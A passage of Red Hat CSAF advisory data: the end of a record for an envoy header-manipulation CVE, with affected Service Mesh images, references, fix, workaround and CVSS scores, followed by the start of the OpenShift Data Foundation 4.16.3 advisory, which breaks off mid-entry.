"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45806", }, { category: "external", summary: "RHBZ#2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45806", url: "https://www.cve.org/CVERecord?id=CVE-2024-45806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", }, ], release_date: "2024-09-20T00:15:02.293000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Potential to manipulate `x-envoy` headers from external sources", }, ], }
rhsa-2024_8113
Vulnerability from csaf_redhat
Published
2024-10-15 08:52
Modified
2024-12-18 04:39
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update
Notes
Topic
Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an
S3 compatible API.
Bug fixes:
* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)
* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label "cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'", where "CLUSTER_NAMESPACE" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, "cluster.ocs.openshift.io/openshift-storage: ‘’.
With this fix, the user interface adds a static label "cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)
Enhancement:
* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)
All users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an\nS3 compatible API.\n\nBug fixes:\n\n* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)\n\n* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label \"cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'\", where \"CLUSTER_NAMESPACE\" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, \"cluster.ocs.openshift.io/openshift-storage: ‘’.\nWith this fix, the user interface adds a static label \"cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)\n\nEnhancement:\n\n* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)\n\nAll users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8113", url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2283959", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283959", }, { category: "external", summary: "2295324", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295324", }, { category: "external", summary: "2296521", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2296521", }, { category: "external", summary: "2300333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300333", }, { category: "external", summary: "2302463", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302463", }, { category: "external", summary: "2303083", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303083", }, { category: "external", summary: "2304905", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304905", }, { category: "external", summary: "2308445", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308445", }, { category: "external", summary: "2310370", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310370", }, { category: "external", summary: "2312055", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312055", }, { category: "external", summary: "2315708", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315708", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8113.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update", tracking: { current_release_date: "2024-12-18T04:39:02+00:00", generator: { date: "2024-12-18T04:39:02+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:8113", initial_release_date: "2024-10-15T08:52:38+00:00", revision_history: [ { date: "2024-10-15T08:52:38+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-15T08:52:38+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:39:02+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHODF 4.16 for RHEL 9", product: { name: "RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_data_foundation:4.16::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Data Foundation", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product: { name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product_id: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product: { name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product_id: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product: { name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product_id: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product: { name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product_id: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product: { name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product_id: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product: { name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product_id: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product_identification_helper: { purl: 